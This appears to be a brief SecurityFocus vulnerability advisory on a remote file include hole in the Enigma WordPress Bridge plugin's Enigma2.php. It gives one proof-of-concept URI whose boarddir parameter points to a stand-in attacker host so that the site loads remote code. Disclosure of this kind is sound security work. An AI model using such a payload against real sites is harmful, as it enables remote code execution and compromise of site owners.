Enigma WordPress Bridge Enigma2.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://evil_scripts?


 

Privacy Statement
Copyright 2010, SecurityFocus